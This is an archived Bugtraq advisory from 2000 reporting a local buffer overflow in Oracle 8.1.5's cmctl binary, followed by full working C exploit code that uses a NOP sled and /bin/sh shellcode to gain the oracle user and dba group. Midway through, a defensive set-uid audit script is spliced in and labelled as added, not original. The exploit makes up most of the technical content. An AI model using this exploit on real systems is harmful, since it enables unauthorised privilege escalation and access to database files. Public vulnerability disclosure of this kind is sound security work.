[17702] in bugtraq


vulnerability in Connection Manager Control binary in Oracle

daemon@ATHENA.MIT.EDU (Juan Manuel Pascual Escriba)
Mon Nov 20 13:35:28 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-Id:  <3A1911B6.2A314D11@plazasite.com>
Date:         Mon, 20 Nov 2000 12:57:42 +0100
Reply-To: pask@PLAZASITE.COM
From: Juan Manuel Pascual Escriba <pask@PLAZASITE.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

Hello Elias


        Could you make this advisory public? Oracle people haven't sent an
answer in 6 days. Please cut these lines.


                                                                Thanks




                      WWW.PLAZASITE.COM
                  System & Security Division

   Title:     Vulnerability in cmctl in Oracle 8.1.5
    Date:     13-11-2000
Platform:     Only tested in Linux, but can be exported to others.
  Impact:     Any local user can gain euid=oracle and egid=dba.
  Author:     Juan Manuel Pascual (pask@plazasite.com)
  Status:     Vendor Contacted. Details Below


OVERVIEW:

    cmctl is the Oracle Connection Manager Control binary.


PROBLEM SUMMARY:

    There is a buffer overflow in cmctl that can be used by local
users to obtain the euid of the oracle user and the egid of dba. With the
default installation the oracle user owns all database files.


IMPACT:

    Any user with local access can gain euid=oracle and egid=dba.


SOLUTION:

    Maybe a chmod -s on the binary ;-)))).
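As an added example (not part of the advisory), the shell snippet below makes the "chmod -s" workaround checkable: it lists every set-uid / set-gid file under an Oracle installation directory, tests a single file for either bit, and clears both bits on one file. The directory layout it creates is a constructed stand-in for $ORACLE_HOME/bin; the `cmctl_fake` file is not the real binary, and the real path from the advisory would be passed instead.

```shell
#!/bin/sh
# Added example, not code from the advisory. Audit helper for the
# "chmod -s" workaround: find and clear set-uid / set-gid bits.

# Print every regular file under $1 that carries set-uid or set-gid.
list_setid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print
}

# Return 0 when $1 carries either bit, 1 otherwise.
has_setid() {
    [ -u "$1" ] || [ -g "$1" ]
}

# Clear both bits on one file (the advisory's "chmod -s", spelled out).
strip_setid() {
    chmod u-s,g-s "$1"
}

# Constructed demo: a scratch directory standing in for $ORACLE_HOME.
demo_dir=$(mktemp -d)
mkdir -p "$demo_dir/bin"
: > "$demo_dir/bin/cmctl_fake"        # constructed stand-in, not the real cmctl
chmod 4755 "$demo_dir/bin/cmctl_fake" # give it the set-uid bit for the demo

echo "set-id files before:"
list_setid_files "$demo_dir"
strip_setid "$demo_dir/bin/cmctl_fake"
echo "set-id files after:"
list_setid_files "$demo_dir"          # prints nothing once the bit is gone

rm -rf "$demo_dir"
```

Run it against the real installation with `list_setid_files "$ORACLE_HOME"` before deciding which binaries actually need their bits; clearing set-uid on a tool that DBAs rely on breaks that tool for non-oracle accounts, so the list is the starting point, not a blanket command.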


STATUS:

    The vendor was contacted on 13/11. No answer was received in the last
4 days.

----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask@plazasite.com



/*
Exploit code for cmctl in Oracle 8.1.5 (8i) for Linux. I tested it on RH 6.2
and 6.1. It is possible to port it to other platforms.

If someone ports this to Sparc please tell me.

Synopsis: buffer overflow in cmctl
Impact:   any user gains euid=oracle and egid=dba.


Dedicated to cmlc guys: juaroflin, oscar, ismak, blas, blackbas and
others.
Thanks for your patience and time.

Special Thanks to my favourite DBA. Xavi "de verdad como sois" Morales.
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen */

#define DEFAULT_OFFSET                    1
#define DEFAULT_BUFFER_SIZE             350
#define NOP                            0x90
/* cmctl is run through the shell so that $pakito is expanded onto its
   command line; that oversized argument is what overflows the buffer. */
#define BINARY  "/usr/local/oracle8i/app/oracle/product/8.1.5/bin/cmctl echo $pakito"


/* Linux/x86 payload that executes /bin/sh. */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Current stack pointer, used as the base for the guessed return address
   (32-bit x86 only: the value is left in %eax, the return register). */
unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) offset  = atoi(argv[1]);
  else {
    printf("Use ./cmctl_start Offset\n");
    exit(1);
  }

  /* Fill the whole buffer with the guessed return address. */
  buff = malloc(bsize);
  addr = get_sp() - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  /* First half becomes a NOP sled ... */
  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  /* ... with the shellcode centred in the buffer; the return addresses
     written above remain in the second half. */
  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  /* Terminate the string and hand it to cmctl via the environment. */
  buff[bsize - 1] = '\0';
  setenv("pakito",buff,1);

  system(BINARY);
  return 0;
}

--


                " In God We trust, Others We monitor "

        -------------------------------------------------------------
         Juan Manuel Pascual Escriba        Administrador de Sistemas
         PlazaSite S.A.                         c/ Tomas Bretsn 32-38
         08950 Esplugues de Llobregat           (Barcelona),    SPAIN
         Ph: +34 93 3717398                       Fax: +34 93 3711968
         mob: 667591142                     Email: pask@plazasite.com
        -------------------------------------------------------------
